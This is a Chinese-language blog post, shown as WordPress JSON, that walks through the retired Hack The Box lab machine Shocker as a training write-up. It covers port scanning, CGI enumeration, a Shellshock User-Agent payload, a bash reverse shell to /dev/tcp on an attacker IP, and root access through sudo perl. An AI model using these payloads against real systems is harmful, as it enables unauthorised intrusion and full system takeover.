{"id":93,"date":"2024-11-13T09:05:58","date_gmt":"2024-11-13T01:05:58","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=93"},"modified":"2024-11-13T09:52:18","modified_gmt":"2024-11-13T01:52:18","slug":"htb_machine_shocker","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_shocker\/","title":{"rendered":"HTB\u9776\u673a Shocker \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.10.56<\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
\u250c\u2500\u2500(root\u327fattacker)-[\/home\/\u2026\/Documents\/vulnhub_notes\/shocker\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.56\nPING 10.10.10.56 (10.10.10.56) 56(84) bytes of data.\n\n--- 10.10.10.56 ping statistics ---\n4 packets transmitted, 0 received, 100% packet loss, time 3078ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u65e0\u6cd5\u8fdb\u884cICMP<\/code>\u901a\u4fe1\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.94SVN scan initiated Tue Jun  4 21:27:26 2024 as: nmap -sA -p- -Pn --min-rate 1000 -oN .\/ack_result.txt 10.10.10.56\nNmap scan report for 10.10.10.56 (10.10.10.56)\nHost is up.\nAll 65535 scanned ports on 10.10.10.56 (10.10.10.56) are in ignored states.\nNot shown: 65535 filtered tcp ports (no-response)\n\n# Nmap done at Tue Jun  4 21:29:39 2024 -- 1 IP address (1 host up) scanned in 132.81 seconds<\/code><\/pre>\n
\u9776\u673a\u672a\u5f00\u653e\u4efb\u4f55TCP<\/code>\u7aef\u53e3\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Tue Jun  4 22:00:36 2024 as: nmap -sT -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.56\nNmap scan report for 10.10.10.56 (10.10.10.56)\nHost is up (0.24s latency).\nNot shown: 65531 closed tcp ports (conn-refused)\nPORT      STATE    SERVICE VERSION\n80\/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Site doesn't have a title (text\/html).\n2222\/tcp  open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)\n|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)\n|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)\n10276\/tcp filtered unknown\n15743\/tcp filtered unknown\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.94SVN%E=4%D=6\/4%OT=80%CT=1%CU=35638%PV=Y%DS=2%DC=T%G=Y%TM=665F1\nOS:E55%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%CI=I%TS=A)SEQ(SP\nOS:=105%GCD=1%ISR=108%TI=Z%II=I%TS=8)SEQ(SP=FD%GCD=1%ISR=10E%TI=Z%II=I%TS=8\nOS:)SEQ(SP=FD%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=A)SEQ(SP=FE%GCD=1%ISR=10E%TI=\nOS:Z%CI=I%II=I%TS=A)OPS(O1=M53CST11NW6%O2=M53CST11NW6%O3=M53CNNT11NW6%O4=M5\nOS:3CST11NW6%O5=M53CST11NW6%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120\nOS:%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M53CNNSNW6%CC=Y%Q=)T1(R=Y%DF\nOS:=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z\nOS:%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=\nOS:Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%\nOS:RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)\nOS:IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   234.91 ms 10.10.14.1 (10.10.14.1)\n2   235.02 ms 10.10.10.56 (10.10.10.56)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Tue Jun  4 22:01:57 2024 -- 1 IP address (1 host up) scanned in 80.64 seconds<\/code><\/pre>\n
**UDP**<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Tue Jun  4 21:44:09 2024 as: nmap -sU -p- -Pn --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.56\nNmap scan report for 10.10.10.56 (10.10.10.56)\nHost is up.\nAll 65535 scanned ports on 10.10.10.56 (10.10.10.56) are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Tue Jun  4 21:45:16 2024 -- 1 IP address (1 host up) scanned in 67.17 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<\/strong>Ubuntu Linux<\/code>\uff0c\u540c\u65f6\u6000\u7591\u9776\u673a\u6709\u7aef\u53e3\u6572\u95e8\u670d\u52a1\u3002<\/strong><\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff082222\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fattacker)-[\/home\/hacker]\n\u2514\u2500# nc -nv 10.10.10.56 2222                                             \n(UNKNOWN) [10.10.10.56] 2222 (?) open\nSSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2<\/code><\/pre>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/10.10.10.56\/<\/code><\/p>\n
\"\"<\/p>\n
\u7f51\u9875\u6e90\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
 <!DOCTYPE html>\n<html>\n<body>\n\n<h2>Don't Bug Me!<\/h2>\n<img src=\"bug.jpg\" alt=\"bug\" style=\"width:450px;height:350px;\">\n\n<\/body>\n<\/html> <\/code><\/pre>\n
\u5c1d\u8bd5\u5c06bug.jpg<\/code>\u4e0b\u8f7d\u5230\u672c\u5730\u5206\u6790\uff0c\u672a\u53d1\u73b0\u5173\u952e\u4fe1\u606f\u3002<\/p>\n
\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff08\u4f7f\u7528directory-list-2.3-small.txt<\/code>\u8fdb\u884c\u5927\u5b57\u5178\u679a\u4e3e\uff0c--add-slash<\/code>\u53c2\u6570\u672b\u5c3e\u52a0\u659c\u6760\uff09\uff1a<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0\/cgi-bin\/<\/code>\u548c\/icons\/<\/code>\u4e24\u4e2a\u76ee\u5f55\u3002\u6000\u7591\u5b58\u5728ShellShock<\/code>\u6f0f\u6d1e\u3002<\/p>\n
\u5c1d\u8bd5\u679a\u4e3e\/cgi-bin\/<\/code>\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Fri Jun  7 20:03:38 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/10.10.10.56\/cgi-bin\/ -x 400,403,404 -t 60 -e cgi,sh\n\n200   118B   http:\/\/10.10.10.56\/cgi-bin\/user.sh<\/code><\/pre>\n
\u6210\u529f\u53d1\u73b0\u811a\u672c\u6587\u4ef6user.sh<\/code>\u3002\u4e0b\u8f7d\u540e\u53d1\u73b0\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n
Content-Type: text\/plain\n\nJust an uptime test script\n\n 07:59:29 up  1:39,  0 users,  load average: 0.00, 0.00, 0.00\n<\/code><\/pre>\n
\u53d1\u73b0\u8be5CGI<\/code>\u811a\u672c\u660e\u663e\u6267\u884c\u4e86uptime<\/code>\u547d\u4ee4\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
\u5c1d\u8bd5\u4f7f\u7528ShellShock<\/code>\u6f0f\u6d1e\u653b\u51fb\u8be5CGI<\/code>\u7a0b\u5e8f\uff1a<\/p>\n
# Change the contents of HTTP User-Agent to this: \n() { :; }; echo ; \/usr\/bin\/id<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0<\/strong>**ShellShock**<\/code>\u6f0f\u6d1e\uff01<\/strong>\u76f4\u63a5\u53cd\u5f39Shell\uff1a<\/p>\n
() { :; }; echo ; \/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.12\/443 0>&1'<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n
\n
\u6743\u9650\u63d0\u5347<\/h1>\n
Sudo Perl\u63d0\u6743<\/h2>\n
\u5c1d\u8bd5\u4f7f\u7528sudo -l<\/code>\u547d\u4ee4\u67e5\u770b\u5f53\u524d\u7528\u6237\u6743\u9650\uff1a<\/p>\n
\"\"<\/p>\n
\u76f4\u63a5\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\u63d0\u6743\uff08\u4fee\u6539root<\/code>\u5bc6\u7801\uff0c\u6539\u5b8c\u4e4b\u540esu -<\/code>\u5207\u6362\u7528\u6237\u81f3root<\/code>\uff09\uff1a<\/p>\n
sudo perl -e 'exec \"passwd root\";'<\/code><\/pre>\n
\"\"<\/p>\n
\u63d0\u6743\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n
\n
Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n
2b8dbe47f884402243dbc2b65f4818d1<\/code><\/pre>\n
\n
\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
\n","protected":false},"excerpt":{"rendered":"
\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.56 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fattacker)-[\/home\/\u2026\/Doc …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-93","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/93","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=93"}],"version-history":[{"count":2,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/93\/revisions"}],"predecessor-version":[{"id":95,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/93\/revisions\/95"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=93"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=93"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=93"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}